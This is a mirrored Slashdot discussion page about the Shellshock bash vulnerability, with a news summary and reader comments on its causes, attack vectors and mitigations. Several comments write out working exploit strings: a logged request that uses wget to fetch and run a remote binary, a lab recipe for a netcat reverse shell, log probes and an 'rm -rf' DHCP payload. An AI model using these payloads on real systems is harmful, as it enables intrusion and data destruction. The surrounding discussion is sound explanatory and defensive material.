Slashdot Mirror
Flurry of Scans Hint That Bash Vulnerability Could Already Be In the Wild
The recently disclosed bug in bash was bad enough as a theoretical exploit; now, reports Ars Technica, it could already be being used to launch real attacks. In a blog post yesterday, Robert Graham of Errata Security noted that someone is already using a massive Internet scan to locate vulnerable servers for attack. In a brief scan, he found over 3,000 servers that were vulnerable "just on port 80"—the Internet Protocol port used for normal Web Hypertext Transfer Protocol (HTTP) requests. And his scan broke after a short period, meaning that there could be vast numbers of other servers vulnerable. A Google search by Ars using advanced search parameters yielded over two billion web pages that at least partially fit the profile for the Shellshock exploit.
More bad news: "[T]he initial fix for the issue still left Bash vulnerable to attack, according to a new US CERT National Vulnerability Database entry." And CNET is not the only one to say that Shellshock, which can affect Macs running OS X as well as Linux and Unix systems, could be worse than Heartbleed.
You mean "worse than a vulnerability that doesn't seem to have been exploited on any significant scale"?
To be fair, anyone using bash as the cgi handler for anything remotely serious was already doing it wrong. Bash by it's nature is a facility trying to let the presumably authenticated user of it to do whatever they want, even if it looks somewhat weird. Yes this bug warrants fixing, but putting bash or similar in a path where untrusted environment variables and/or argv is present is a very dubious design decision. Besides, fork and exec for every request is a huge no no, and that's the only way to fly with bash.
Outside of malicious HTTP headers landing in environment variable in CGI land, I'm hard pressed to think of another reasonable vector for this bug to be a problem...
XML is like violence. If it doesn't solve the problem, use more.
Versions affected go all the way back to BASH 1.14.0
which dates from 1994. So that's 20 years.
http://web.nvd.nist.gov/view/v...
The "With many eyes all bugs are shallow" myth is busted again.
but IS it?
Looking at security discussions in terms of OS is really, really dumb. Windows wasnt vulnerable to heartbleed or this, but not because its Windows. Linux isnt affected because of the kernel. As has been the case for a very long time, actual OS flaws are exceedingly rare.
Anyone who uses this as an opportunity to post a screed about how Linux is better or worse than Windows is showing their ignorance by boiling down complex security considerations into black and whites.
The vulnerability is that a string that looks like a function definition can be constructed to be immediately executed prior to execution of the bash script. (This is to support truly ancient bash scripts back when functions were defined as VARIABLE()="() { body }".) However, a bug in that code means the entire value gets executed as a bash script, and so it's possible to append code to the function definition, and it'll get executed as bash code.
Essentially, it's lesson #1 why not to use eval() in your programs.
The danger is that user inputs in Web programs are frequently passed as environment variables to programs. This is especially true in CGI, where the request URI and HTTP headers are passed as environment variables.
This means if you use bash in your CGI, you can execute whatever command you like, as "apache" or whoever you're executing your CGI as. Remotely.
Wonder what the public key field is for?
That ultimately the BASH vulnerability would be used to blame Apple for bad security.
Of course news about a fake are Fake News.
There is evidence that this is being exploited in the wild.
Nginx and Apache servers using mod_cgi are two potentially vulnerable services.
The risk is that it is possible to modify environment variables which then could allow the execution of arbitrary code with the permissions of the parent process.
An example attack:
GET./.HTTP/1.0 .User-Agent:.Thanks-Rob .Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
Over at the Internet Storm Center http://isc.sans.org/ they have been updating their advisory and and a have a simple one-liner to test if a system is vulnerable.
Average Intelligence is a Scary Thing
If you're running Apache on Linux/UNIX, and don't absolutely need CGI, turn it off now.
Put a "#" in front of /etc/httpd/conf/httpd.conf. This will totally disable all CGI scripts. That's a good thing. Apache is willing to execute CGI scripts from far too many directories, and many Linux distros have some default CGI scripts lying around.
LoadModule cgi_module modules/mod_cgi.so
in
Note that this will break CPanel, but not non-CGI admin tools such as Webmin.
People are out there probing. This is from an Apache server log today from a dedicated server I run.
89.207.135.125 - - [24/Sep/2014:23:08:56 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 301 338 "-" "() { :;}; /bin/ping
-c 1 198.101.206.138"
The bug is 25 years old at least. Pre-dates the existence of GIT and most other source code control software in use today. I have no idea what SCC would've been used 25 years ago. To give perspective -- this bug predates the WWW by at least a year.
Folks, for what it's worth, here is a management briefing I wrote this morning. Please feel free to re-use, but please do give proper attribution. Please do comment and correct as appropriate.
Summary: Briefing for management on activities to minimize impacts of the "shellshock" computer vulnerability.
Status: Testing underway. Our initial scans and appraisals are that our public-facing systems are likely not subject to shellshock. NOTE: The situation is fluid, due to the nature of the vulnerability. Personnel are also reaching out to hosting providers to assess the status of intervening systems.
What is it? A vulnerability in a command interpreter found on the vast majority of Linux and UNIX systems, including web servers, development machines, routers, firewalls, etc. The vulnerability could allow an anonymous attacker to execute arbitrary commands remotely, and to obtain the results of these commands via their browser. The security community has nicknamed the vulnerability "shellshock" since it affects computer command interpreters known as shells.
How does it work? Command interpreters, or "shells", are the computer components that allow users to type and execute computer commands. Anytime a user works in a terminal window, they are using a command interpreter - think of the DOS command prompt. Some GUI applications, especially administrative applications, are in fact just graphical interfaces to command interpreters. The most common command interpreter on Linux and UNIX is known as the "bash shell". Within the last several days, security researchers discovered that a serious vulnerability has been present in the vast majority of instances of bash for the last twenty years. This vulnerability allows an attacker with access to a bash shell to execute arbitrary commands. Because many web servers use system command interpreters to fulfill user requests, attackers need not have physical access to a system: The ability to issue web requests, using their browser or commonly-available command line tools, may be enough.
How bad could it be? Very, very bad. The vulnerability may exist on the vast majority of Linux and UNIX systems shipped over the last 20 years, including web servers, development machines, routers, firewalls, other network appliances, printers, Mac OSX computers, Android phones, and possibly iPhones (note: It has yet to be established that smartphones are affected, but given that Android and iOS are variants of Linus and UNIX, respectively, it would be premature to exclude them). Furthermore, many such systems have web-based administrative interfaces: While many of these machines do not provide a "web server" in the sense of a server providing content of interest to the casual or "normal" user, many do provide web-based interfaces for diagnotics and administration. Any such system that provides dynamic content using system utilities may be vulnerable.
What is the primary risk? There are two, data loss and system modification. By allowing an attacker to execute arbitrary commands, the shellshock vulnerability may allow the attacker to both obtain data from a system and to make changes to system configuration. There is also a third risk, that of using affected systems to launch attacks against other systems, so-called "reflector" attacks: The arbitrary command specified by the attacker could be to direct a network utility against a third machine.
How easy is it to detect the vulnerability? Surprising easily: A single command executed using ubiquitous system tools will reveal whether any particular web device or web server is vulnerable.
What are we doing? Technical personnel are using these commands to test all web servers and other devices we manage and are working with hosting providers to ensure that all devices upon which we depend have been tested. When devices are determined to be vulnerable, a determination is made whether they should be left alone (e.g., if t
I'm here EdgeKeep Inc.
Basically, this Bash bug is really only exploitable by remote users because of some questionable decisions made in designing the software stack. This isn't an "open source" vs. "closed source" thing. This is a "We'll just trust data received from untrusted sources!" thing.
If your web/dhcp/print/etc. server is *accepting environment variables from random strangers* and then *executing a full-bore shell program* using those environment variables then guess what: You're freakin' server was already vulnerable and this Bash bug is just exposing the vulnerability, not causing it!!
Seriously, if Windows had a design like this then we'd be hearing the old "insecure by design!" schtick, and I'm not going to hold Linux to a lesser standard.
AntiFA: An abbreviation for Anti First Amendment.
As far as I can see, the vulnerability is a remote exec for the following cases:
- Use of web server on the platform using CGI scripts
- For Linux devices that are configured to use DHCP, dhclient-script, a rogue DHCP server can pass in exploit code.
This is supposed to be worse than heartbleed which leaked the contents of system memory? OK for web servers I see the danger, but this doesn't seem to be a major exploit for people not running web servers & using fixed IPs.
Macs in particular rarely have web servers running on them & their DHCP client mechanism is different.
Democracy is a sheep and two wolves deciding what to have for lunch. Freedom is a well armed sheep contesting the issue
Uhh.. I guess I'd say the "many eyes" have been saying for almost 20 years that a website that takes in user data and then passes that to a shell to run an executable is kinda stupid, and insecure.
You misunderstand the nature of the bug. Your cgi or app doesn't have to pass anything to an executable. A static call is just as vulnerable here - if a cgi app calls system("/path/to/safe/executable") with no parameters at all, you'll still be bitten, because the system() call executes /bin/sh to run the command in, and inherits the environment from the web browser.
Something like this will suffice:
telnet HOST 80 (or openssl s_client -connect HOST:443)
GET
Host: HOST
Cookie: () {
Connection: close
And it's not restricted to http cgi either. Several dhcp clients call sh, so you can get instahacked by trying to acquire an open network connection. Rather worse, because dhcpd/dhclient tend to run as root so they can set up routing and set up the resolver.
There are many other attack vectors for this one.
Yes, it's bad.
The system call in some languages will do that, and in some won't except under certain circumstances.
In Perl if you give system() a list it won't call the shell. If you give it a single scalar it will call the shell only if there are shell metacharacters in that scalar.
I understand the nature of the bug. I ALSO think it's stupid to call an executable and pass in a parameter from the user.
AccountKiller
Oh, and as an addendum, I consider anything that originates from the client, something that the user can generate.
i.e. untrusted input is untrusted input. People get far to specific about that kind of thing. If you're taking input from a client, and passing it to a system executable in some way, that's bad.
AccountKiller
These days, Windows is the faster, more stable, and more secure choice.
Yes, Windows 8 has definitely demonstrated awesome superiority and everyone loves it.
In those days [late 80s/early 90s] revision control wasn't universally used. Even as late as the early 00's I was training engineers coming out of master's degree IT programs who had no idea how to use a revision control system.
Linus didn't use a revision control system for the Linux kernel until 2002.
(Aw... comparisons between CVS and the "soon to be finished" Subversion. How quaint.)
Here's a fun little test. This is assuming both the attacker and target have netcat installed. On a machine with the vulnerable bash and apache-cgi (behind a firewall for god's sake!) drop a file in your cgi-bin directory:
You should be able to go to
and get a listing of apache's cgi directory.
Now, from your attack machine run "nc -l -p 1234", and then (in another terminal) run "curl -A "() { :;}; /bin/nc attack.machine.ip.address 1234 -c /bin/bash". You now have a shell via netcat.
(from attacking machine netcat)
(on target)
Am I the only person who just assumed Bash was for users? Why would you let anybody run bash?
Why in the world would people thoughtlessly run any command under CGI? I didn't know about this bash feature but I never imagined placing a shell into CGI... it feels like giving the public a shell account. shells are user interfaces not servers. This feature is probably useful for users and they won't be able to easily disable it-- a bunch of specific case patches means it'll probably pop up in other misuses of bash.
I bet this has been used for decades by hackers for defacing websites, since the cgi-bin user often has write access to the html.
If you properly locked down cgi-bin just how much harm could they do in jail? (not that we should just jail shells and let people have at it, but the purpose for jailing your cgi-bin is to minimize damage.)
DHCP is interesting and new; I didn't know that the DHCP server could get my system to run bash commands... I guess I have to figure out what user the DHCP client runs under...
Democracy Now! - uncensored, anti-establishment news
I may be naive, but it's difficult for me to believe that someone thought up the attack vector from just thinking about shells in general.
It's not that hard to believe, maybe someone was designing some piece of software where they wanted to use functionality like that. They wanted to have the browser end up defining a function in bash, and then run some additional code, and did some tests to see if it would work. They found that not only will it work, but it will work a whole lot better than they thought it would. At that point, time to tell someone.
"Our two-party system is like a bowl of shit looking at itself in a mirror." - Lewis Black
Just saw this in the server logs on one of our servers:
/cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 392 "-" "() { :; }; /usr/bin/wget 82.165.144.187/bbbbbbbbbbbb"
// 82.165.144.187/bbbbbbbbbbbb to confirm the system is vulnerable).
82.165.144.187 - - [25/Sep/2014:18:55:59 +0200] "GET
An attempt at exploiting the vulnerability (trying to wget h t t p :
I am not even sure that this should be considered a bug in Bash. Why should we be surprised when a program whose sole purpose is to execute arbitrary commands is found to execute arbitrary commands? The only surprise is that it does so to a greater extent than expected. There have been documents since the 90's which emphasized the need to not pass unsanitized data to a CGI script and even more specifically Bash. I think that there could be a good argument that the bug is really in mod_cgi. Think of it this way, if a web application passes unvalidated input to an SQL server which in turn exposes data in unexpected ways is the bug in the SQL server?
-rd
I'm not the original poster, but my idea goes like this:
- very often, when a laptop gets an IP from DHCP, it will launch a collection of helper scripts (that will in turn set-up lots of other thing. Random example: firewalling rules for the new interface)
- check which fields emitted by a DHCP server will end up in an environment variable during the call of these helper scripts.
Very obvisouly, the IP address will be in an environment variable, but that's not going to work because you can't put arbitrary data in there.
What else? Assigned network name? Some other data field?
Some of these data could have arbitrary form. /".
So you set it to "(){:;};rm -rf
Even before the helper script has had time to receive the data and do the necessary sanity check on it, bash will interpret the whole content (because it begins with () ) including the rm.
Any piece of software that:
- at some point of time runs helper shell scripts
- can receive arbitrary data that is placed in ENV variable while calling the scripts
is at risk.
Because BASH itself forgot to do its own input sanitation. (it should only load the function definition. It should not blindy eval any ENV variable beginin with (), it should only interpret the curly craces right after the () and stop once the body of the function is finished. Not call anything else).
That a REALLY nasty exploit.
"Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]